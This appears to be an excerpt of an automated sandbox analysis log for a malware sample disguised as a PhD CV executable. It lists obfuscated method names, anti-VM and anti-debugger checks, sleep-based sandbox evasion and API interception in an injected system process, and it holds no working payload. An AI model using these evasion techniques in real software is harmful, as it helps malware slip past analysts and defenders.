                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, C56UGQSFELu56dFZvV.csHigh entropy of concatenated method names: 'ToString', 'zO5IHaElRp', 'BKhIchoGQb', 'ytnIxExleZ', 'Wc7I9YJuDT', 'QmkIip7qC8', 'kbZIh76Y7R', 'elUIocK9Rq', 'JSyILTulJv', 'CWQIlvvte0'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, UCOAOPrktr4U7UxP0NR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FhY3HZvgUv', 'hy63X8ocT4', 'F4q3RT9H8G', 'OYI3nGg8D6', 'iSE3QXJgDj', 'TnT3S8s4DS', 'A6l3dqr7rs'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, wmVo37whu47G86cakd.csHigh entropy of concatenated method names: 'uHfVKshP77', 'UOQVtjwppC', 'G5TVC2ljCQ', 'YhNVwAOswK', 'osfVeARa6L', 'C2YVI2svVG', 'eEfVafPIuG', 'fyNVUCNKjG', 'NhWVGhKTeP', 'TQZV3wcVP3'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, KdYkBblFN3q21HXc97.csHigh entropy of concatenated method names: 'xSyMu5aP0W', 'rDPMDHoFRO', 's92MZ6vScg', 'Hi4MKkSMV4', 'dGXMskqmMU', 'jX7MtNCwC8', 'QF2MOaqwVF', 'nSJMCKqQcE', 'HUVMwwOLMI', 'rc7M41xq7h'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, HRXIbhRp0dPPgKOIdA.csHigh entropy of concatenated method names: 'tXNWCe3tad', 'xXMWwws9kV', 'BIDWTCHCck', 'MA7WcgitbZ', 'g2vW9Zdc8i', 'yXuWi5WY3m', 'Qi7WoJG6xH', 'RHSWLSNPRw', 'oNMWpU5lNW', 'JTLWHtmaH9'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, f6pnFxo6DhXlf5Ae3A.csHigh entropy of concatenated method names: 'PFkM8kcTmo', 'n0NMV0MN2c', 'j9nMbgHyJg', 'tNobP94Da5', 'OWqbzyeVGg', 'vrvMku1HZ0', 'slgMrqufrH', 'BQXM6s52Vq', 'zxxMBPYERG', 'FWcMAjoYGa'
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Maryam Farokhi-PhD- CV-1403.exe PID: 7832, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D144
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D604
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D764
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D324
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D364
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D004
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878FF74
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFBA878D864
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: 1970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: 93F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: 7CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: A3F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: B3F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E rdtsc 2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9104Jump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.9 %
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe TID: 4408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504Thread sleep count: 122 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504Thread sleep time: -244000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504Thread sleep count: 9104 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6504Thread sleep time: -18208000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C6C5F0 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C5F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: netbtugc.exe, 00000004.00000002.33207890621.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33208178086.000000000077F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000006.00000002.30363720488.000001AFAD7A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E rdtsc 2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00417943 LdrLoadDll,2_2_00417943
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3C0F6 mov eax, dword ptr fs:[00000030h]2_2_00F3C0F6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC0E0 mov ecx, dword ptr fs:[00000030h]2_2_00FCC0E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC60A0 mov eax, dword ptr fs:[00000030h]2_2_00FC60A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F800A5 mov eax, dword ptr fs:[00000030h]2_2_00F800A5
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3A093 mov ecx, dword ptr fs:[00000030h]2_2_00F3A093
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3C090 mov eax, dword ptr fs:[00000030h]2_2_00F3C090
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD6090 mov eax, dword ptr fs:[00000030h]2_2_00FD6090
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46074 mov eax, dword ptr fs:[00000030h]2_2_00F46074
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46074 mov eax, dword ptr fs:[00000030h]2_2_00F46074
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70044 mov eax, dword ptr fs:[00000030h]2_2_00F70044
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC6040 mov eax, dword ptr fs:[00000030h]2_2_00FC6040
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82010 mov ecx, dword ptr fs:[00000030h]2_2_00F82010
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010081EE mov eax, dword ptr fs:[00000030h]2_2_010081EE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010081EE mov eax, dword ptr fs:[00000030h]2_2_010081EE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48009 mov eax, dword ptr fs:[00000030h]2_2_00F48009
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F501F1 mov eax, dword ptr fs:[00000030h]2_2_00F501F1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F501F1 mov eax, dword ptr fs:[00000030h]2_2_00F501F1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F501F1 mov eax, dword ptr fs:[00000030h]2_2_00F501F1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A1E3 mov eax, dword ptr fs:[00000030h]2_2_00F4A1E3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A1E3 mov eax, dword ptr fs:[00000030h]2_2_00F4A1E3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A1E3 mov eax, dword ptr fs:[00000030h]2_2_00F4A1E3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A1E3 mov eax, dword ptr fs:[00000030h]2_2_00F4A1E3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A1E3 mov eax, dword ptr fs:[00000030h]2_2_00F4A1E3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F381EB mov eax, dword ptr fs:[00000030h]2_2_00F381EB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F501C0 mov eax, dword ptr fs:[00000030h]2_2_00F501C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F501C0 mov eax, dword ptr fs:[00000030h]2_2_00F501C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F741BB mov ecx, dword ptr fs:[00000030h]2_2_00F741BB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F741BB mov eax, dword ptr fs:[00000030h]2_2_00F741BB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F741BB mov eax, dword ptr fs:[00000030h]2_2_00F741BB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E1A4 mov eax, dword ptr fs:[00000030h]2_2_00F7E1A4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E1A4 mov eax, dword ptr fs:[00000030h]2_2_00F7E1A4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44180 mov eax, dword ptr fs:[00000030h]2_2_00F44180
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44180 mov eax, dword ptr fs:[00000030h]2_2_00F44180
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44180 mov eax, dword ptr fs:[00000030h]2_2_00F44180
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014080 mov eax, dword ptr fs:[00000030h]2_2_01014080
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46179 mov eax, dword ptr fs:[00000030h]2_2_00F46179
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7415F mov eax, dword ptr fs:[00000030h]2_2_00F7415F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3A147 mov eax, dword ptr fs:[00000030h]2_2_00F3A147
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3A147 mov eax, dword ptr fs:[00000030h]2_2_00F3A147
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3A147 mov eax, dword ptr fs:[00000030h]2_2_00F3A147
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCA130 mov eax, dword ptr fs:[00000030h]2_2_00FCA130
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70118 mov eax, dword ptr fs:[00000030h]2_2_00F70118
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F502F9 mov eax, dword ptr fs:[00000030h]2_2_00F502F9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A2E0 mov eax, dword ptr fs:[00000030h]2_2_00F4A2E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A2E0 mov eax, dword ptr fs:[00000030h]2_2_00F4A2E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A2E0 mov eax, dword ptr fs:[00000030h]2_2_00F4A2E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A2E0 mov eax, dword ptr fs:[00000030h]2_2_00F4A2E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A2E0 mov eax, dword ptr fs:[00000030h]2_2_00F4A2E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A2E0 mov eax, dword ptr fs:[00000030h]2_2_00F4A2E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F482E0 mov eax, dword ptr fs:[00000030h]2_2_00F482E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F482E0 mov eax, dword ptr fs:[00000030h]2_2_00F482E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F482E0 mov eax, dword ptr fs:[00000030h]2_2_00F482E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F482E0 mov eax, dword ptr fs:[00000030h]2_2_00F482E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3C2B0 mov ecx, dword ptr fs:[00000030h]2_2_00F3C2B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F642AF mov eax, dword ptr fs:[00000030h]2_2_00F642AF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F642AF mov eax, dword ptr fs:[00000030h]2_2_00F642AF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE289 mov eax, dword ptr fs:[00000030h]2_2_00FBE289
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F60230 mov ecx, dword ptr fs:[00000030h]2_2_00F60230
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0227 mov eax, dword ptr fs:[00000030h]2_2_00FC0227
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0227 mov eax, dword ptr fs:[00000030h]2_2_00FC0227
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0227 mov eax, dword ptr fs:[00000030h]2_2_00FC0227
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A22B mov eax, dword ptr fs:[00000030h]2_2_00F7A22B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A22B mov eax, dword ptr fs:[00000030h]2_2_00F7A22B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A22B mov eax, dword ptr fs:[00000030h]2_2_00F7A22B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3821B mov eax, dword ptr fs:[00000030h]2_2_00F3821B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3A200 mov eax, dword ptr fs:[00000030h]2_2_00F3A200
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCE3DD mov eax, dword ptr fs:[00000030h]2_2_00FCE3DD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F743D0 mov ecx, dword ptr fs:[00000030h]2_2_00F743D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC43D5 mov eax, dword ptr fs:[00000030h]2_2_00FC43D5
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3E3C0 mov eax, dword ptr fs:[00000030h]2_2_00F3E3C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3E3C0 mov eax, dword ptr fs:[00000030h]2_2_00F3E3C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3E3C0 mov eax, dword ptr fs:[00000030h]2_2_00F3E3C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3C3C7 mov eax, dword ptr fs:[00000030h]2_2_00F3C3C7
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F463CB mov eax, dword ptr fs:[00000030h]2_2_00F463CB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE43BA mov eax, dword ptr fs:[00000030h]2_2_00FE43BA
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE43BA mov eax, dword ptr fs:[00000030h]2_2_00FE43BA
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC3B0 mov eax, dword ptr fs:[00000030h]2_2_00FBC3B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6A390 mov eax, dword ptr fs:[00000030h]2_2_00F6A390
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6A390 mov eax, dword ptr fs:[00000030h]2_2_00F6A390
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6A390 mov eax, dword ptr fs:[00000030h]2_2_00F6A390
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE372 mov eax, dword ptr fs:[00000030h]2_2_00FBE372
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE372 mov eax, dword ptr fs:[00000030h]2_2_00FBE372
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE372 mov eax, dword ptr fs:[00000030h]2_2_00FBE372
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE372 mov eax, dword ptr fs:[00000030h]2_2_00FBE372
